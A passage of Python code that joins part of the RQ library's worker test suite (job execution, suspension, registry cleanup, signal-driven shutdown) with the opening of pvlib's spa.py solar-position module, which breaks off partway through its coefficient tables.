self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
"""Ensure Worker custom job class is not global."""
q = Queue()
worker_custom = Worker([q], job_class=CustomJob)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.job_class, CustomJob)
self.assertEqual(worker_generic.job_class, Job)
self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
"""Worker processes work, with forking disabled,
then returns."""
fooq, barq = Queue('foo'), Queue('bar')
w = SimpleWorker([fooq, barq])
self.assertEqual(w.work(burst=True), False,
'Did not expect any work on the queue.')
job = fooq.enqueue(say_pid)
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, os.getpid(),
'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
"""SimpleWorker's key must last longer than job.timeout when working"""
queue = Queue('foo')
worker = SimpleWorker([queue])
job_timeout = 300
job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
worker.work(burst=True)
job.refresh()
self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
"""Prepare job execution does the necessary bookkeeping."""
queue = Queue(connection=self.testconn)
job = queue.enqueue(say_hello)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Updates worker statuses
self.assertEqual(worker.get_state(), 'busy')
self.assertEqual(worker.get_current_job_id(), job.id)
def test_prepare_job_execution_inf_timeout(self):
"""Prepare job execution handles infinite job timeout"""
queue = Queue(connection=self.testconn)
job = queue.enqueue(long_running_job,
args=(1,),
job_timeout=-1)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Score in queue is +inf
self.assertEqual(self.testconn.zscore(registry.key, job.id), float('Inf'))
def test_work_unicode_friendly(self):
"""Worker processes work with unicode description, then quits."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Adam',
description='你好 世界!')
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, 'Hi there, Adam!')
self.assertEqual(job.description, '你好 世界!')
def test_work_log_unicode_friendly(self):
"""Worker process work with unicode or str other than pure ascii content,
logging work properly"""
q = Queue("foo")
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
"""Test Pause Worker Execution"""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
q.enqueue(create_file, SENTINEL_FILE)
w = Worker([q])
suspend(self.testconn)
w.work(burst=True)
assert q.count == 1
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
resume(self.testconn)
w.work(burst=True)
assert q.count == 0
self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
q = Queue()
for _ in range(5):
q.enqueue(do_nothing)
w = Worker([q])
# This suspends workers for working for 2 second
suspend(self.testconn, 2)
# So when this burst of work happens the queue should remain at 5
w.work(burst=True)
assert q.count == 5
sleep(3)
# The suspension should be expired now, and a burst of work should now clear the queue
w.work(burst=True)
assert q.count == 0
def test_worker_hash_(self):
"""Workers are hashed by their .name attribute"""
q = Queue('foo')
w1 = Worker([q], name="worker1")
w2 = Worker([q], name="worker2")
w3 = Worker([q], name="worker1")
worker_set = set([w1, w2, w3])
self.assertEqual(len(worker_set), 2)
def test_worker_sets_birth(self):
"""Ensure worker correctly sets worker birth date."""
q = Queue()
w = Worker([q])
w.register_birth()
birth_date = w.birth_date
self.assertIsNotNone(birth_date)
self.assertEqual(type(birth_date).__name__, 'datetime')
def test_worker_sets_death(self):
"""Ensure worker correctly sets worker death date."""
q = Queue()
w = Worker([q])
w.register_death()
death_date = w.death_date
self.assertIsNotNone(death_date)
self.assertIsInstance(death_date, datetime)
def test_clean_queue_registries(self):
"""worker.clean_registries sets last_cleaned_at and cleans registries."""
foo_queue = Queue('foo', connection=self.testconn)
foo_registry = StartedJobRegistry('foo', connection=self.testconn)
self.testconn.zadd(foo_registry.key, {'foo': 1})
self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
bar_queue = Queue('bar', connection=self.testconn)
bar_registry = StartedJobRegistry('bar', connection=self.testconn)
self.testconn.zadd(bar_registry.key, {'bar': 1})
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
worker = Worker([foo_queue, bar_queue])
self.assertEqual(worker.last_cleaned_at, None)
worker.clean_registries()
self.assertNotEqual(worker.last_cleaned_at, None)
self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
# worker.clean_registries() only runs once every 15 minutes
# If we add another key, calling clean_registries() should do nothing
self.testconn.zadd(bar_registry.key, {'bar': 1})
worker.clean_registries()
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
    """Workers should run maintenance tasks on startup and every hour."""
    queue = Queue(connection=self.testconn)
    worker = Worker(queue)
    # Fresh worker (never cleaned): maintenance is due immediately.
    self.assertTrue(worker.should_run_maintenance_tasks)

    worker.last_cleaned_at = utcnow()
    self.assertFalse(worker.should_run_maintenance_tasks)
    # 3700s is just over one hour, so maintenance is due again.
    worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
    self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
    """Worker calls clean_registries when run."""
    queue = Queue(connection=self.testconn)
    registry = StartedJobRegistry(connection=self.testconn)
    # Plant a stale registry entry; a burst run should clean it out.
    self.testconn.zadd(registry.key, {'foo': 1})

    worker = Worker(queue, connection=self.testconn)
    worker.work(burst=True)
    self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
    """Dependencies added while the job gets finished shouldn't get lost."""
    # This patches the enqueue_dependents to enqueue a new dependency AFTER
    # the original code was executed.
    orig_enqueue_dependents = Queue.enqueue_dependents

    def new_enqueue_dependents(self, job, *args, **kwargs):
        orig_enqueue_dependents(self, job, *args, **kwargs)
        if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
            Queue._add_enqueue = None
            Queue().enqueue_call(say_hello, depends_on=job)

    Queue.enqueue_dependents = new_enqueue_dependents
    try:
        q = Queue()
        w = Worker([q])
        with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
            parent_job = q.enqueue(say_hello, result_ttl=0)
            Queue._add_enqueue = parent_job
            job = q.enqueue_call(say_hello, depends_on=parent_job)
            w.work(burst=True)
            job = Job.fetch(job.id)
            self.assertEqual(job.get_status(), JobStatus.FINISHED)

        # The created spy checks two issues:
        # * before the fix of #739, 2 of the 3 jobs where executed due
        #   to the race condition
        # * during the development another issue was fixed:
        #   due to a missing pipeline usage in Queue.enqueue_job, the job
        #   which was enqueued before the "rollback" was executed twice.
        #   So before that fix the call count was 4 instead of 3
        self.assertEqual(mocked.call_count, 3)
    finally:
        # Undo the class-level monkeypatch so it cannot leak into other
        # tests if an assertion above fails.
        Queue.enqueue_dependents = orig_enqueue_dependents
def test_self_modification_persistence(self):
    """Make sure that any meta modification done by
    the job itself persists completely through the
    queue/worker/job stack."""
    queue = Queue()
    # Pre-existing metadata must survive alongside the job's own changes.
    job = queue.enqueue(modify_self,
                        meta={'foo': 'bar', 'baz': 42},
                        args=[{'baz': 10, 'newinfo': 'waka'}])

    worker = Worker([queue])
    worker.work(burst=True)

    reloaded = Job.fetch(job.id)
    self.assertEqual(reloaded.meta['foo'], 'bar')
    self.assertEqual(reloaded.meta['baz'], 10)
    self.assertEqual(reloaded.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
    """Make sure that any meta modification done by
    the job itself persists completely through the
    queue/worker/job stack -- even if the job errored"""
    queue = Queue()
    # Pre-existing metadata must survive alongside the job's own changes.
    job = queue.enqueue(modify_self_and_error,
                        meta={'foo': 'bar', 'baz': 42},
                        args=[{'baz': 10, 'newinfo': 'waka'}])

    worker = Worker([queue])
    worker.work(burst=True)

    # Postconditions: queue drained, job in the failed registry, and the
    # worker no longer reports a current job.
    self.assertEqual(queue.count, 0)
    self.assertTrue(job in FailedJobRegistry(queue=queue))
    self.assertEqual(worker.get_current_job_id(), None)

    reloaded = Job.fetch(job.id)
    self.assertEqual(reloaded.meta['foo'], 'bar')
    self.assertEqual(reloaded.meta['baz'], 10)
    self.assertEqual(reloaded.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
    """Check that log_result_lifespan True causes job lifespan to be logged."""
    q = Queue()
    w = Worker([q])
    job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w.perform_job(job, q)
    # The worker logs lazily ('%s' args), so match on the format string
    # rather than interpolated text.
    mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
    self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
    """Check that log_result_lifespan False causes job lifespan to not be logged."""
    q = Queue()

    class TestWorker(Worker):
        # Subclass toggle under test: suppresses the retention log line.
        log_result_lifespan = False

    w = TestWorker([q])
    job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w.perform_job(job, q)
    self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
    """Check that log_job_description True causes job lifespan to be logged."""
    q = Queue()
    w = Worker([q])
    q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w.dequeue_job_and_maintain_ttl(10)
    # The third positional log argument carries the job description,
    # which includes the enqueued args.
    self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
    """Check that log_job_description False causes job lifespan to not be logged."""
    q = Queue()
    w = Worker([q], log_job_description=False)
    q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w.dequeue_job_and_maintain_ttl(10)
    # With the flag off, the description (and thus the args) is omitted.
    self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
    """A version set before registration survives refresh and re-fetch."""
    queue = Queue()
    worker = Worker([queue])
    worker.version = '0.0.0'

    worker.register_birth()
    self.assertEqual(worker.version, '0.0.0')
    worker.refresh()
    self.assertEqual(worker.version, '0.0.0')

    # making sure that version is preserved when worker is retrieved by key
    fetched = Worker.find_by_key(worker.key)
    self.assertEqual(fetched.version, '0.0.0')
def test_python_version(self):
    """python_version defaults to sys.version and survives round-trips."""
    queue = Queue()

    worker = Worker([queue])
    worker.register_birth()
    self.assertEqual(worker.python_version, sys.version)

    # now patching version: the dummy value must stick, both on the live
    # instance and when the worker is fetched back by key
    dummy_version = 'X.Y.Z.final'
    self.assertNotEqual(dummy_version, sys.version)  # otherwise tests are pointless
    other = Worker([queue])
    other.python_version = dummy_version
    other.register_birth()
    self.assertEqual(other.python_version, dummy_version)
    fetched = Worker.find_by_key(other.key)
    self.assertEqual(fetched.python_version, dummy_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
    """Pause for ``time_to_wait`` seconds, then SIGKILL process ``pid``."""
    time.sleep(time_to_wait)
    os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
    """Mixin that arms a SIGALRM watchdog so a test stuck in a worker loop
    fails after ``killtimeout`` seconds instead of hanging the suite."""

    def setUp(self):
        # we want tests to fail if signal are ignored and the work remain
        # running, so set a signal to kill them after X seconds
        self.killtimeout = 15
        signal.signal(signal.SIGALRM, self._timeout)
        signal.alarm(self.killtimeout)

    def _timeout(self, signum, frame):
        # Renamed the first parameter from `signal` to `signum` so it does
        # not shadow the `signal` module (the handler is always invoked
        # positionally by the signal machinery).
        raise AssertionError(
            "test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
        )
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
    """Signal-driven shutdown behaviour: warm/cold SIGTERM handling and
    recovery when the forked work horse dies or freezes."""

    @slow
    def test_idle_worker_warm_shutdown(self):
        """worker with no ongoing job receiving single SIGTERM signal and shutting down"""
        w = Worker('foo')
        self.assertFalse(w._stop_requested)
        # kill_worker sends a single SIGTERM to this process from a child.
        p = Process(target=kill_worker, args=(os.getpid(), False))
        p.start()

        w.work()

        p.join(1)
        # An idle worker exits its loop without ever flagging a stop.
        self.assertFalse(w._stop_requested)

    @slow
    def test_working_worker_warm_shutdown(self):
        """worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
        fooq = Queue('foo')
        w = Worker(fooq)

        # The job runs ~2s; the SIGTERM arrives while it is still going.
        sentinel_file = '/tmp/.rq_sentinel_warm'
        fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
        self.assertFalse(w._stop_requested)
        p = Process(target=kill_worker, args=(os.getpid(), False))
        p.start()

        w.work()

        p.join(2)
        self.assertFalse(p.is_alive())
        self.assertTrue(w._stop_requested)
        # Warm shutdown let the job run to completion first.
        self.assertTrue(os.path.exists(sentinel_file))

        self.assertIsNotNone(w.shutdown_requested_date)
        self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')

    @slow
    def test_working_worker_cold_shutdown(self):
        """Busy worker shuts down immediately on double SIGTERM signal"""
        fooq = Queue('foo')
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_cold'
        fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
        self.assertFalse(w._stop_requested)
        # Second SIGTERM (True) forces an immediate, cold shutdown.
        p = Process(target=kill_worker, args=(os.getpid(), True))
        p.start()

        self.assertRaises(SystemExit, w.work)

        p.join(1)
        self.assertTrue(w._stop_requested)
        # The job was killed mid-flight, so its sentinel was never written.
        self.assertFalse(os.path.exists(sentinel_file))

        shutdown_requested_date = w.shutdown_requested_date
        self.assertIsNotNone(shutdown_requested_date)
        self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')

    @slow
    def test_work_horse_death_sets_job_failed(self):
        """worker with an ongoing job whose work horse dies unexpectadly (before
        completing the job) should set the job's status to FAILED
        """
        fooq = Queue('foo')
        self.assertEqual(fooq.count, 0)
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
        if os.path.exists(sentinel_file):
            os.remove(sentinel_file)
        fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
        job, queue = w.dequeue_job_and_maintain_ttl(5)
        w.fork_work_horse(job, queue)
        # SIGKILL the horse shortly after the fork, while the job runs.
        p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
        p.start()
        w.monitor_work_horse(job)
        job_status = job.get_status()
        p.join(1)
        self.assertEqual(job_status, JobStatus.FAILED)
        failed_job_registry = FailedJobRegistry(queue=fooq)
        self.assertTrue(job in failed_job_registry)
        self.assertEqual(fooq.count, 0)

    @slow
    def test_work_horse_force_death(self):
        """Simulate a frozen worker that doesn't observe the timeout properly.
        Fake it by artificially setting the timeout of the parent process to
        something much smaller after the process is already forked.
        """
        fooq = Queue('foo')
        self.assertEqual(fooq.count, 0)
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
        if os.path.exists(sentinel_file):
            os.remove(sentinel_file)
        fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
        job, queue = w.dequeue_job_and_maintain_ttl(5)
        w.fork_work_horse(job, queue)
        # Shrink the timeout only after forking, so the parent gives up
        # quickly while the horse would happily run for 100s.
        job.timeout = 5
        w.job_monitoring_interval = 1
        now = utcnow()
        w.monitor_work_horse(job)
        # Monitoring must bail out within interval + timeout (+ slack),
        # proving the frozen horse was force-killed rather than waited on.
        fudge_factor = 1
        total_time = w.job_monitoring_interval + 5 + fudge_factor
        self.assertTrue((utcnow() - now).total_seconds() < total_time)
        self.assertEqual(job.get_status(), JobStatus.FAILED)
        failed_job_registry = FailedJobRegistry(queue=fooq)
        self.assertTrue(job in failed_job_registry)
        self.assertEqual(fooq.count, 0)
def schedule_access_self():
    """Enqueue ``access_self`` on the default queue (job that enqueues a job)."""
    default_queue = Queue('default', connection=get_current_connection())
    default_queue.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
    """Run the ``rqworker`` CLI as a real subprocess against the test Redis."""

    def setUp(self):
        super(TestWorkerSubprocess, self).setUp()
        # Point the CLI at the same Redis database the test fixtures use.
        db_num = self.testconn.connection_pool.connection_kwargs['db']
        self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num

    def test_run_empty_queue(self):
        """Run the worker in its own process with an empty queue"""
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])

    def test_run_access_self(self):
        """Schedule a job, then run the worker as subprocess"""
        q = Queue()
        job = q.enqueue(access_self)
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
        registry = FinishedJobRegistry(queue=q)
        self.assertTrue(job in registry)
        assert q.count == 0

    @skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
    def test_run_scheduled_access_self(self):
        """Schedule a job that schedules a job, then run the worker as subprocess"""
        q = Queue()
        job = q.enqueue(schedule_access_self)
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
        registry = FinishedJobRegistry(queue=q)
        self.assertTrue(job in registry)
        assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
    """HerokuWorker shutdown handling: SIGRTMIN triggers the
    imminent-shutdown sequence in the work horse."""

    def setUp(self):
        super(HerokuWorkerShutdownTestCase, self).setUp()
        # Scratch directory the dummy worker writes its marker files into.
        self.sandbox = '/tmp/rq_shutdown/'
        os.makedirs(self.sandbox)

    def tearDown(self):
        shutil.rmtree(self.sandbox, ignore_errors=True)

    @slow
    def test_immediate_shutdown(self):
        """Heroku work horse shutdown with immediate (0 second) kill"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        # The job started but was interrupted before it could finish.
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
        with open(os.path.join(self.sandbox, 'stderr.log')) as f:
            stderr = f.read().strip('\n')
            err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
            self.assertTrue(stderr.endswith(err), stderr)

    @slow
    def test_1_sec_shutdown(self):
        """Heroku work horse shutdown with 1 second kill"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        time.sleep(0.1)
        # Still alive during the 1s grace period...
        self.assertEqual(p.exitcode, None)
        p.join(2)
        # ...then terminated by the alarm.
        self.assertEqual(p.exitcode, 1)
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
        with open(os.path.join(self.sandbox, 'stderr.log')) as f:
            stderr = f.read().strip('\n')
            err = 'ShutDownImminentException: shut down imminent (signal: SIGALRM)'
            self.assertTrue(stderr.endswith(err), stderr)

    @slow
    def test_shutdown_double_sigrtmin(self):
        """Heroku work horse shutdown with long delay but SIGRTMIN sent twice"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        # we have to wait a short while otherwise the second signal won't be
        # processed.
        time.sleep(0.1)
        os.kill(p.pid, signal.SIGRTMIN)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
        with open(os.path.join(self.sandbox, 'stderr.log')) as f:
            stderr = f.read().strip('\n')
            err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
            self.assertTrue(stderr.endswith(err), stderr)

    @mock.patch('rq.worker.logger.info')
    def test_handle_shutdown_request(self, mock_logger_info):
        """Mutate HerokuWorker so _horse_pid refers to an artificial process
        and test handle_warm_shutdown_request"""
        w = HerokuWorker('foo')

        path = os.path.join(self.sandbox, 'shouldnt_exist')
        p = Process(target=create_file_after_timeout, args=(path, 2))
        p.start()
        self.assertEqual(p.exitcode, None)

        w._horse_pid = p.pid
        w.handle_warm_shutdown_request()
        p.join(2)
        # would expect p.exitcode to be -34 but for some reason os.waitpid is setting it to None, even though
        # the process has ended
        self.assertEqual(p.exitcode, None)
        self.assertFalse(os.path.exists(path))
        mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)

    def test_handle_shutdown_request_no_horse(self):
        """Mutate HerokuWorker so _horse_pid refers to non existent process
        and test handle_warm_shutdown_request"""
        w = HerokuWorker('foo')
        # A stale / nonexistent pid must not raise.
        w._horse_pid = 19999
        w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
    """Regression test: exception handling must cope with non-ASCII
    exception messages."""

    def setUp(self):
        super(TestExceptionHandlerMessageEncoding, self).setUp()
        self.worker = Worker("foo")
        # Drop the default handlers so only the encoding path is exercised.
        self.worker._exc_handlers = []
        # Mimic how exception info is actually passed forwards
        try:
            raise Exception(u"💪")
        except Exception:
            self.exc_info = sys.exc_info()

    def test_handle_exception_handles_non_ascii_in_exception_message(self):
        """worker.handle_exception doesn't crash on non-ascii in exception message."""
        self.worker.handle_exception(Mock(), *self.exc_info)
|
spa.py
|
"""
Calculate the solar position using the NREL SPA algorithm either using
numpy arrays or compiling the code to machine language with numba.
"""
# Contributors:
# Created by Tony Lorenzo (@alorenzo175), Univ. of Arizona, 2015
import os
import threading
import warnings
import numpy as np
# this block is a way to use an environment variable to switch between
# compiling the functions with numba or just use numpy
def nocompile(*args, **kwargs):
    """Stand-in for ``numba.jit`` that returns the function unchanged.

    Accepts (and ignores) any signature/keyword arguments so call sites
    written for ``jit`` work without numba installed.
    """
    def decorator(func):
        return func
    return decorator
# Select the compilation strategy: numba JIT when requested via the
# PVLIB_USE_NUMBA environment variable and available, otherwise plain numpy.
if os.getenv('PVLIB_USE_NUMBA', '0') != '0':
    try:
        from numba import jit, __version__
    except ImportError:
        warnings.warn('Could not import numba, falling back to numpy '
                      'calculation')
        jcompile = nocompile
        USE_NUMBA = False
    else:
        major, minor = __version__.split('.')[:2]
        # need at least numba >= 0.17.0
        # Compare as an integer tuple. The original code evaluated
        # int(major + minor), i.e. string concatenation, so e.g. numba 1.0
        # ('1' + '0' -> 10) would wrongly be rejected as older than 0.17.
        if (int(major), int(minor)) >= (0, 17):
            jcompile = jit
            USE_NUMBA = True
        else:
            warnings.warn('Numba version must be >= 0.17.0, falling back to '
                          'numpy')
            jcompile = nocompile
            USE_NUMBA = False
else:
    jcompile = nocompile
    USE_NUMBA = False
TABLE_1_DICT = {
'L0': np.array(
[[175347046.0, 0.0, 0.0],
[3341656.0, 4.6692568, 6283.07585],
[34894.0, 4.6261, 12566.1517],
[3497.0, 2.7441, 5753.3849],
[3418.0, 2.8289, 3.5231],
[3136.0, 3.6277, 77713.7715],
[2676.0, 4.4181, 7860.4194],
[2343.0, 6.1352, 3930.2097],
[1324.0, 0.7425, 11506.7698],
[1273.0, 2.0371, 529.691],
[1199.0, 1.1096, 1577.3435],
[990.0, 5.233, 5884.927],
[902.0, 2.045, 26.298],
[857.0, 3.508, 398.149],
[780.0, 1.179, 5223.694],
[753.0, 2.533, 5507.553],
[505.0, 4.583, 18849.228],
[492.0, 4.205, 775.523],
[357.0, 2.92, 0.067],
[317.0, 5.849, 11790.629],
[284.0, 1.899, 796.298],
[271.0, 0.315, 10977.079],
[243.0, 0.345, 5486.778],
[206.0, 4.806, 2544.314],
[205.0, 1.869, 5573.143],
[202.0, 2.458, 6069.777],
[156.0, 0.833, 213.299],
[132.0, 3.411, 2942.463],
[126.0, 1.083, 20.775],
[115.0, 0.645, 0.98],
[103.0, 0.636, 4694.003],
[102.0, 0.976, 15720.839],
[102.0, 4.267, 7.114],
[99.0, 6.21, 2146.17],
[98.0, 0.68, 155.42],
[86.0, 5.98, 161000.69],
[85.0, 1.3, 6275.96],
[85.0, 3.67, 71430.7],
[80.0, 1.81, 17260.15],
[79.0, 3.04, 12036.46],
[75.0, 1.76, 5088.63],
[74.0, 3.5, 3154.69],
[74.0, 4.68, 801.82],
[70.0, 0.83, 9437.76],
[62.0, 3.98, 8827.39],
[61.0, 1.82, 7084.9],
[57.0, 2.78, 6286.6],
[56.0, 4.39, 14143.5],
[56.0, 3.47, 6279.55],
[52.0, 0.19, 12139.55],
[52.0, 1.33, 1748.02],
[51.0, 0.28, 5856.48],
[49.0, 0.49, 1194.45],
[41.0, 5.37, 8429.24],
[41.0, 2.4, 19651.05],
[39.0, 6.17, 10447.39],
[37.0, 6.04, 10213.29],
[37.0, 2.57, 1059.38],
[36.0, 1.71, 2352.87],
[36.0, 1.78, 6812.77],
[33.0, 0.59, 17789.85],
[30.0, 0.44, 83996.85],
[30.0, 2.74, 1349.87],
[25.0, 3.16, 4690.48]]),
'L1': np.array(
[[628331966747.0, 0.0, 0.0],
[206059.0, 2.678235, 6283.07585],
[4303.0, 2.6351, 12566.1517],
[425.0, 1.59, 3.523],
[119.0, 5.796, 26.298],
[109.0, 2.966, 1577.344],
[93.0, 2.59, 18849.23],
[72.0, 1.14, 529.69],
[68.0, 1.87, 398.15],
[67.0, 4.41, 5507.55],
[59.0, 2.89, 5223.69],
[56.0, 2.17, 155.42],
[45.0, 0.4, 796.3],
[36.0, 0.47, 775.52],
[29.0, 2.65, 7.11],
[21.0, 5.34, 0.98],
[19.0, 1.85, 5486.78],
[19.0, 4.97, 213.3],
[17.0, 2.99, 6275.96],
[16.0, 0.03, 2544.31],
[16.0, 1.43, 2146.17],
[15.0, 1.21, 10977.08],
[12.0, 2.83, 1748.02],
[12.0, 3.26, 5088.63],
[12.0, 5.27, 1194.45],
[12.0, 2.08, 4694.0],
[11.0, 0.77, 553.57],
[10.0, 1.3, 6286.6],
[10.0, 4.24, 1349.87],
[9.0, 2.7, 242.73],
[9.0, 5.64, 951.72],
[8.0, 5.3, 2352.87],
[6.0, 2.65, 9437.76],
[6.0, 4.67, 4690.48]]),
'L2': np.array(
[[52919.0, 0.0, 0.0],
[8720.0, 1.0721, 6283.0758],
[309.0, 0.867, 12566.152],
[27.0, 0.05, 3.52],
[16.0, 5.19, 26.3],
[16.0, 3.68, 155.42],
[10.0, 0.76, 18849.23],
[9.0, 2.06, 77713.77],
[7.0, 0.83, 775.52],
[5.0, 4.66, 1577.34],
[4.0, 1.03, 7.11],
[4.0, 3.44, 5573.14],
[3.0, 5.14, 796.3],
[3.0, 6.05, 5507.55],
[3.0, 1.19, 242.73],
[3.0, 6.12, 529.69],
[3.0, 0.31, 398.15],
[3.0, 2.28, 553.57],
[2.0, 4.38, 5223.69],
[2.0, 3.75, 0.98]]),
'L3': np.array(
[[289.0, 5.844, 6283.076],
[35.0, 0.0, 0.0],
[17.0, 5.49, 12566.15],
[3.0, 5.2, 155.42],
[1.0, 4.72, 3.52],
[1.0, 5.3, 18849.23],
[1.0, 5.97, 242.73]]),
'L4': np.array(
[[114.0, 3.142, 0.0],
[8.0, 4.13, 6283.08],
[1.0, 3.84, 12566.15]]),
'L5': np.array(
[[1.0, 3.14, 0.0]]),
'B0': np.array(
[[280.0, 3.199, 84334.662],
[102.0, 5.422, 5507.553],
[80.0, 3.88, 5223.69],
[44.0, 3.7, 2352.87],
[32.0, 4.0, 1577.34]]),
'B1': np.array(
[[9.0, 3.9, 5507.55],
[6.0, 1.73, 5223.69]]),
'R0': np.array(
[[100013989.0, 0.0, 0.0],
[1670700.0, 3.0984635, 6283.07585],
[13956.0, 3.05525, 12566.1517],
[3084.0, 5.1985, 77713.7715],
[1628.0, 1.1739, 5753.3849],
[1576.0, 2.8469, 7860.4194],
[925.0, 5.453, 11506.77],
[542.0, 4.564, 3930.21],
[472.0, 3.661, 5884.927],
[346.0, 0.964, 5507.553],
[329.0, 5.9, 5223.694],
[307.0, 0.299, 5573.143],
[243.0, 4.273, 11790.629],
[212.0, 5.847, 1577.344],
[186.0, 5.022, 10977.079],
[175.0, 3.012, 18849.228],
[110.0, 5.055, 5486.778],
[98.0, 0.89, 6069.78],
[86.0, 5.69, 15720.84],
[86.0, 1.27, 161000.69],
[65.0, 0.27, 17260.15],
[63.0, 0.92, 529.69],
[57.0, 2.01, 83996.85],
[56.0, 5.24, 71430.7],
[49.0, 3.25, 2544.31],
[47.0, 2.58, 775.52],
[45.0, 5.54, 9437.76],
[43.0, 6.01, 6275.96],
[39.0, 5.36, 4694.0],
[38.0, 2.39, 8827.39],
[37.0, 0.83, 19651.05],
[37.0, 4.9, 12139.55],
[36.0, 1.67, 12036.46],
[35.0, 1.84, 2942.46],
[33.0, 0.24, 7084.9],
[32.0, 0.18, 5088.63],
[32.0, 1.78, 398.15],
